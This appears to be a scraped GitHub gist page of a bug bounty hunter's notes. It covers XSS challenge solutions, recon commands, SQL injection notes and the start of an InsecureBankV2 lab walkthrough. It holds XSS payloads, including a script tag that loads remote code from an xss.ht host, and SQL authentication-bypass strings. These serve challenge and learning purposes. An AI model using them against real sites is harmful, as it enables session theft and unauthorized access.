Chase Jensen ruevaughn
@ruevaughn
ruevaughn / 12 Days of xss-mas
Last active June 20, 2021 20:24
12 days of xss-mas challenges. Solutions to the XSS challenge here https://www.youtube.com/watch?v=d84SP5r6n9c&t=824s
1. A phishing page to try and fool me
<script>
window.location='example.com'
</script>
2. two viral vids
<script src=me2.xss.ht></script>
<script>
document.body.innerHTML='<iframe src="https://youtube.com/embed/dQw4w9WgXcQ?autoplay=1" allow="autoplay"></iframe>'
</script>
@ruevaughn
ruevaughn / gist:db6a77f8e15a87b5e2e5f9580b532fb5
Created June 26, 2021 22:33
Input Sanitization Snippets
const unsafeCharacters = ["&", "`", "\"", "{", "}", "(", ")", "[", "]", "=", ",", "+"];
function sanitize(str) {
  str += "";
  for (let char of unsafeCharacters) {
    str = str.replaceAll(char, `&#x${char.codePointAt().toString(0x10)};`);
  }
  return str;
}
@ruevaughn
ruevaughn / tools
Last active October 8, 2021 14:17
Recon portion of my approach to bug bounties. It's a WIP
find . -type f -name "*.body"
find . -type f -name "*.body" | html-tool tags title | vim -
ggrep -Hrni ""
ggrep -hri ""
%! sort -u --version-sort
onaws domain.com
subfinder -d domain.com | dnsx -req
https://feross.org/how-to-setup-your-linode/
notepad c:\windows\system32\drivers\etc\hosts
Measure TCP handshake and SSL exchange time - Perform a test of how much time it takes to perform both the TCP
curl -kso /dev/null -w "tcp:%{time_connect}, ssldone:%{time_appconnect}\n" https://linuxsecurity.expert/
scp ~/.ssh/id_rsa.pub <your username>@<your server ip>:
mkdir .ssh
https://learn.pranjalsinghal.in/bug-bounty/
https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html
https://brutelogic.com.br/blog/xss-via-http-headers/
https://brutelogic.com.br/lab/header.php
https://brutelogic.com.br/blog/the-7-main-xss-cases-everyone-should-know/
https://brutelogic.com.br/gym.php
https://amzn.to/3r8B8am
query = "SELECT * FROM users WHERE name='" + user + "' AND password='" + password + "'";
SELECT * FROM users WHERE name='jane' AND password='x' OR '1'='1';
- MySQL, MSSQL, Oracle, PostgreSQL, SQLite:
OWASP TOP 10 2013-2021 #1 Vulnerability: Injection
# SQLinjection
' OR '1'='1' -- ' OR '1'='1' /*
' UNION SELECT 'admin' AS password# Password = admin
@ruevaughn
ruevaughn / InsecureBankV2.tutorial.md
Last active September 27, 2024 09:29
InsecureBankV2 Android App Walkthrough

InsecureBankV2 Tutorial

This is a writeup of my solutions to the intentionally vulnerable Android app. If you want to solve the challenge yourself, you can download the APK from here. In most cases I recommend trying the challenge yourself first before reading the solution. If you are new to testing Android applications or vulnerability assessment in general, you may gain more out of it by reading and then attempting. Do what works for you.

Setup


Follow my blog post for instructions on setting up this lab, or follow the instructions here. First we are going to cover the tools used and how to set them up, then I am going to cover the vulnerabilities found in this app.

@ruevaughn
ruevaughn / apis
Last active August 22, 2021 08:14
curl -H "Authorization: token $GH_TOKEN" -H "Accept: application/vnd.github.v3+json" https://api.github.com/user/orgs
body {
margin: 0;
overflow: hidden;
}
a {
position: fixed;
display: inline-block;
margin-left: calc(50vw - 70px);
font-size:20px;
@ruevaughn
ruevaughn / logger.js
Last active September 11, 2021 04:24
export const LogLevels = {
  log: 0,
  info: 1,
  warn: 2,
  error: 3
}
function clone(arr) {
  return arr.map(a => JSON.parse(JSON.stringify(a)))
}